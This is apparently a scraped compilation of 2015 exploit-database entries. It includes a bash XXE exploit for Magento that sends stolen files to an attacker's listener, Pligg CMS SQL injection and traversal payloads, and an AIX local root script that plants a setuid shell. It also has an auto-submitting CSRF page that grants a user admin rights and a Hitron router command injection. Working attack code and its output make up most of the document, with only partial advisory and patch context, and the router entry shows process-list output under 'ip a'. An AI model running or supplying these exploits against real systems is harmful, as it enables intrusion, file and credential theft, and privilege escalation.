# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index
#
#
# [File retrieval from the remote server]
# 
# ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT
#
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80
#
# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:
# http://192.168.10.5:80/fetch.php?D=[base64_string]
# You should have the receiver server/script listening on the specified port before running this exploit.
#

TIMEOUT=6
PAYLOAD_TMP_FILE="/tmp/payload-utf16.xml"

if [ $# -ne 1 ] && [ $# -ne 4 ] ; then 
	echo -e "\nUsage: \n"
	echo -e "[Vulnerability test]\n"
	echo -e "$0 MAGENTO_SOAP_API_URL"
	echo -e "E.g:"
	echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n";
	echo -e "[File retrieval]\n"
	echo -e "$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT"
	echo -e "E.g:"
	echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\n";
	exit 2;
else 
	TARGETURL="$1"
fi
if [ $# -eq 4 ]; then 
	FILE="$2"	
	RECEIVER_HOST="$3"
	RECEIVER_PORT="$4"
	TEST_ONLY=0
else
	TEST_ONLY=1
fi 

if [ $TEST_ONLY -eq 1 ]; then 
	# Vulnerability test 
	# Perform only a test by reading /dev/random file
	TEST_PAYLOAD_XML='<?xml version="1.0" encoding="UTF-16"?>
	<!DOCTYPE foo [  
	<!ELEMENT PoC ANY >
	<!ENTITY % xxe SYSTEM "file:///dev/random" >
		%xxe;
	]>'

	echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
	echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n"

	# Fetching /dev/random should cause the remote script to block
	# on reading /dev/random until the script times out.
	# If there is no delay it means the remote script is not vulnerable or 
	# /dev/random is not accessible.
	START=$(date +%s)
	wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
	END=$(date +%s)
	DIFF=$(expr $END \- $START )

	if [ $DIFF -eq $TIMEOUT ]; then
		echo "Vulnerable. No response from Magento for $DIFF seconds :)"
		exit 0
	else 
		echo "Not vulnerable, or there is no /dev/random on the remote server ;)"
		exit 1
	fi
else 
	# File retrieval XXE payload
	SEND_DTD="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
	<!ENTITY % all \"<!ENTITY &#37; send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\">
	%all;"
	SEND_DTD_B64="`echo "$SEND_DTD" | base64 -w0`"
	FILE_PAYLOAD_XML="<?xml version=\"1.0\" encoding=\"UTF-16\"?>
	<!DOCTYPE foo [  
	<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$FILE\">
	<!ENTITY % dtd SYSTEM \"data://text/plain;base64,$SEND_DTD_B64\">
	%dtd;

	%send;
	]>"

	# Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT
	echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
	echo -e "Target URL: $TARGETURL\n\nInjecting XXE payload to retrieve the $FILE file..."
	echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]\n"
	echo -e "If in doubt, try the vulnerability test option.\n"
	wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
fi


--------------------------------

The above exploit uses the Out of band XXE payload which sends
any retrieved data back to the attacker even though the attacker cannot
see the resulting file in the server's response directly. 
This exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend 
Framework which prohibits network access. This is achieved through the usage of
php://filter wrapper which is treated as a local resource by the XML ENTITY 
handler even though it references remote resources. 

Successful exploitation in a test mode ('Vulnerability test', exploit run 
without parameters other than the URL to Magento SOAP API) will result in a 
time out and an internal server error caused by the XML ENTITY accessing 
/dev/random file which will block the API script. 

For example:

---

$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index
Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting Test XXE payload (/dev/random). Might take a few seconds.

--2015-05-19 22:14:17--  http://vulnhost/magento/index.php/api/soap/index
Resolving precise (vulnhost)... 127.0.0.1
Connecting to vulnhost (vulnhost)|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in 
headers. Giving up.

Vulnerable. No response from Magento for 6 seconds :)

---


Arbitrary file accessible to the PHP process can also be fetched with the 
above exploit by using the following syntax:

---

attacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090

Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting XXE payload to retrieve the /etc/passwd file... 

If successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php/D=[base64_result]
If in doubt, try the vulnerability test option.

--2015-05-19 22:33:06--  http://vulnhost/magento/index.php/api/soap/index
Resolving vulnhost (vulnhost)... 192.168.57.12
Connecting to vulnhost (vulnhost)|192.168.57.12|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in 
headers. Giving up.

---

The result will be sent to attacker's server listening on port 9090 which
needs to be set up before running the exploit:

---

attacker# nc -vv -l 9090

Listening on [0.0.0.0] (family 0, port 9090)
Connection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227)
GET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0
Host: attackershost:9090


attacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]

---


It may also be possible to execute arbitrary commands on the remote server
if the remote PHP installation has the 'expect' module enabled.
In such case, an attacker could use expect:// wrapper within XML ENTITY
to execute any command in the context of the PHP process.
For example, by adding the XML entity of:

<ENTITY % file SYSTEM "expect://id">

the attacker could execute the /usr/bin/id command on the remote Magento host.


VI. BUSINESS IMPACT
-------------------------

This issue should be marked as high/critical due to the wide deployment of 
eBay Magento software, low complexity of exploitation, as well as a possibility
of an unauthenticated remote exploitation as demonstrated in this advisory. 
If successful, an attacker could access sensitive files available to the
web server process, cause Denial Of Service, or even execute arbitrary commands
on the server with the permissions of the PHP/web process if certain PHP 
modules are installed.

There is also a growing number of servers set up to serve PHP code with 
PHP-FPM, especially in web hosting environments which need to respond to heavy
load.
There are official Magento tutorials explaining how to set up Magento with Nginx
and PHP FPM for best performance:

http://info.magento.com/rs/magentocommerce/images/
MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf
 
VII. SYSTEMS AFFECTED
-------------------------

Versions of eBay Magento CE equal to 1.9.2.1, or older can be exploited on a
web server with PHP-FPM SAPI.
eBay Magento EE was not tested, but is also affected by this issue according
to the vendor (see APPSEC-1045), up to version EE 1.14.2.1.

To be exploitable, the system must have a version of libxml library which 
expands XML entities without additional libxml2 settings. This is true for 
older versions, as well as newer versions of libxml2 with missing updates,
such as a fairly recent patch for the issue of CVE-2014-0191. 
For some distributions (see references below) libxml2 patches were released 
as late as April 2015, and for this reason, there are likely many systems 
which still lack the libml2 updates and allow to exploit the Magento/Zend 
vulnerability described in this advisory.

The exploit however does not depend on a PHP version installed. In fact, the
exploit was confirmed to work on Fedora 21 with a new (a month's old) PHP 
version of:

PHP Version => 5.6.14
Build Date => Sep 30 2015 13:53:16

The issue can also be exploited on multiple web servers, as PHP-FPM can be set
up on popular web servers such as Apache, or Nginx on Linux/Unix, as well as 
Windows systems (as per the 'fpm on cygwin' setup guides available on the 
Internet).

 
VIII. SOLUTION
-------------------------

eBay Magento was informed about the issue and assigned it a reference ID of
APPSEC-1045. eBay released a patch bundle titled:

'SUPEE-6788 Patch Bundle'

prior to the release of this advisory. 
To address the vulnerability, the patch should be installed, or Magento should 
be upgraded to the latest version of 1.9.2.2 which already contains the fix.
 
IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt

http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt

http://framework.zend.com/security/advisory/ZF2015-06

Powering Magento with Ngnix and PHP-FPM:
http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf

http://www.securiteam.com/

http://seclists.org/fulldisclosure/2015/Oct/105

Official eBay Magento website:
http://magento.com/

Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML 
Functionality Using Multibyte Payloads' (APPSEC-1045) is available at:

http://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html

CVE-2014-0191 :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191
https://bugzilla.redhat.com/show_bug.cgi?id=1090976


X. DISCOVERED BY
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
 
XI. REVISION HISTORY
-------------------------

Oct 29th, 2015:  Advisory released

Nov 3rd,  2015:  Updated exploit to work on newer libxml2 versions such as 
                 2.9.1 without CVE-2014-0191 patch, updated 'Systems affected' 
                 section, plus minor updates in other sections
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  Directory Traversal
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

The editor delivered with Pligg CMS is vulnerable to directory traversal, which
gives an attacker that obtained admin credentials the opportunity to view any
file stored on the webserver that the webserver user has access to.

Please note that admin credentials are required.

3. Proof of Concept


POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1

the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Directory-Traversal-81.html
HireHackking 
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: - 
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;) 
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv

cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF

/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of
them does not require any credentials, and allows the direct extraction of data
from the database.

3. SQL Injection

Description

Pligg CMS is vulnerable to SQL injection. It is possible to extract data from
all databases that the pligg database user has access to.

Credentials are not required.

Proof Of Concept


http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23

Code


/story.php:168
if(isset($_GET['reply']) && !empty($parent_comment_id)){
        $main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id']));
        $main_smarty->assign('parrent_comment_id',$parent_comment_id);
}
[...]
function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){
        Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments;

        //Set comment order to 1 if it's not set in the admin panel
        if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180);
        elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder'];

        if (!isset($CommentOrder)) $CommentOrder = 1;
        If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";}
        If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";}
        If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";}
        If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";}

[...]

        $comments = $db->get_results("SELECT *
        FROM " . table_comments . "
        WHERE (comment_status='published' $status_sql) AND
               comment_link_id=$link->id AND comment_id = $comment_id
        ORDER BY " . $CommentOrderBy);

4. Blind SQL Injection (Admin Area)

Description

There is a blind SQL Injection in the admin area of Pligg CMS. This allows an
attacker that gained admin credentials to extract data from the database.

The problem exists because the index of the submitted "enabled" POST array is
used in a query. The value is escaped - so using quotes in the injection is not
possible - but it does not place the value in between quotes.

Proof Of Concept


POST /pligg-cms-master/admin/admin_users.php HTTP/1.1

frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1

Code


// admin/admin_users.php
foreach($_POST["enabled"] as $id => $valuea)
{
        $_GET['id'] = $id = $db->escape($id);
        $user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id");

5. Possibly SQL Injection

Description

The upload module is vulnerable to Blind SQL Injection via the "comment" as
well as "id" parameter.

The module seems to be unused at the moment, but if it were to be used in the
future, or if an attacker finds a different way to execute it, it would be
vulnerable.

The requests to trigger the vulnerabilities would be:

POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23

POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1<script' or 1%3D1%23></script>&number=1&comment=1

Code


./modules/upload/upload.php:
if ($_POST['id'])
{
        $linkres=new Link;
        $linkres->id = sanitize($_POST['id'], 3);
        if(!is_numeric($linkres->id)) die("Wrong ID");
        if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number");
        if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files");

        // Remove old file and thumbnails with same number
        $sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'";

The first problem is that $_POST[comment] is never sanitized.

The second problem is that $_POST['id'] is first sanitized by removing tags,
then it is checked if that result is nummeric, and finally the original POST
value is used. Because of this, it is possible to put the injection inside tags
to bypass the check.

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Multiple-SQL-Injections-82.html
HireHackking 
<!--
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt


Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:
================================
PHP Server Monitor 3.1.1


Vulnerability Type:
=================================
Privilege Escalation / CSRF


Vulnerability Details:
=====================

PHP Server Monitor uses level 20 for basic user and level 10 for Admins these are stored in Database. Basic users can elevate thier privileges to that of Administrator
by crafting an HTTP payload changing their level to '10' then getting an Administrator to click an infected link or visit a malicious website to launch an
CSRF attack which will grant the user admin access. This problem is due to no CSRF protection mechanism in place. 


Exploit code(s):
===============

1) privilege escalation / CSRF
-->

<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>

<form id="HELL" action="http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=3" method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="10">
<input type="text" name="password" value="">
<input type="text" name="password_repeat" value="">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>


</body>
</html>


<!--
Exploitation Technique:
=======================
Remote


Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure


Severity Level:
=========================================================
High


Description:
==========================================================


Request Method(s):              [+]  POST


Vulnerable Product:             [+]  PHP Server Monitor 3.1.1
  

===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
-->
HireHackking 
# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution 
# Author: Dolev Farhi (dolevf at protonmail.ch)
# Date: 29-10-2015
# Vendor homepage: http://www.hitrontech.com/en/index.php
# Software version: 4.5.8.16
# Hardware version: 1A

# Details:
Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI).
This interface is vulnerable to code injection using the && argument after the IP address.

# Steps to reproduce:
1. Navigate to the dashboard
2. Navigate to the admin tab
3. Type an ip address in the Destination form
4. append any code you want after the ip.

Example one: 
8.8.8.8 && cat /etc/passwd

Result

root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
=============Complete==============



Example two:
8.8.8.8 && ip a 
PID USER VSZ STAT COMMAND
1 root 1268 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
7 root 0 SW [irq/74-hw_mutex]
8 root 0 SW [sync_supers]
9 root 0 SW [bdi-default]
10 root 0 SW< [kblockd]
11 root 0 SW< [gPunitWorkqueue]
12 root 0 SW [irq/79-punit_in]
13 root 0 SW [kswapd0]
14 root 0 SW< [crypto]